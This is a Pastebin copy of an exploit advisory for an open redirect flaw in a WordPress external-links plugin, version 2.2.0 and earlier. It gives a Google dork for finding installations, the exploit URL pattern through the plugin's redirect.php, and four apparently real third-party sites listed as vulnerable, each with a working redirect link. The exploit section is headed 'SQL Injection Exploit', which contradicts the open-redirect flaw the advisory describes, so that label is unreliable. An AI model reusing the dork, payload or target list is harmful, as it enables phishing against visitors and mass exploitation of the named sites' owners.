Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : WordPress WP-JS-External-Link-Info Plugins 2.2.0 Open Redirection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/02/2019
- # Vendor Homepage : finewebdev.com
- # Software Download Link : downloads.wordpress.org/plugin/wp-external-links.1.81.zip
- downloads.wordpress.org/plugin/wp-external-links.2.2.0.zip
- # Software Information Link : wordpress.org/plugins/wp-external-links/
- # Software Version : 1.21 - 1.81 - 2.2.0 and all previous versions.
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/wp-content/plugins/wp-js-external-link-info''
- # Vulnerability Type : CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- âWP External Links (nofollow new tab seo)â is open source software.
- Manage external and internal links on your site.
- ####################################################################
- # Impact :
- ***********
- WordPress Plugin WP Js External Link Info is prone to an open redirect vulnerability
- because the application fails to properly verify user-supplied input.
- Exploiting this issue may allow attackers to redirect users to arbitrary web sites
- and conduct phishing attacks; other attacks are also possible.
- WordPress Plugin WP Js External Link Info version 1.21 - 1.81 and 2.2.0 is
- vulnerable; prior versions may also be affected.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://{OPEN-REDIRECTION}.gov
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] new.0points.com/wp/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://cxsecurity.com
- [+] foerderverein-bergbad.de/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://packetstormsecurity.com
- [+] wataaah.de/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://www.cyberizm.org/
- [+] blogoprage.ru/wp-content/plugins/wp-js-external-link-info/redirect.php?url=https://exploit4arab.org
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement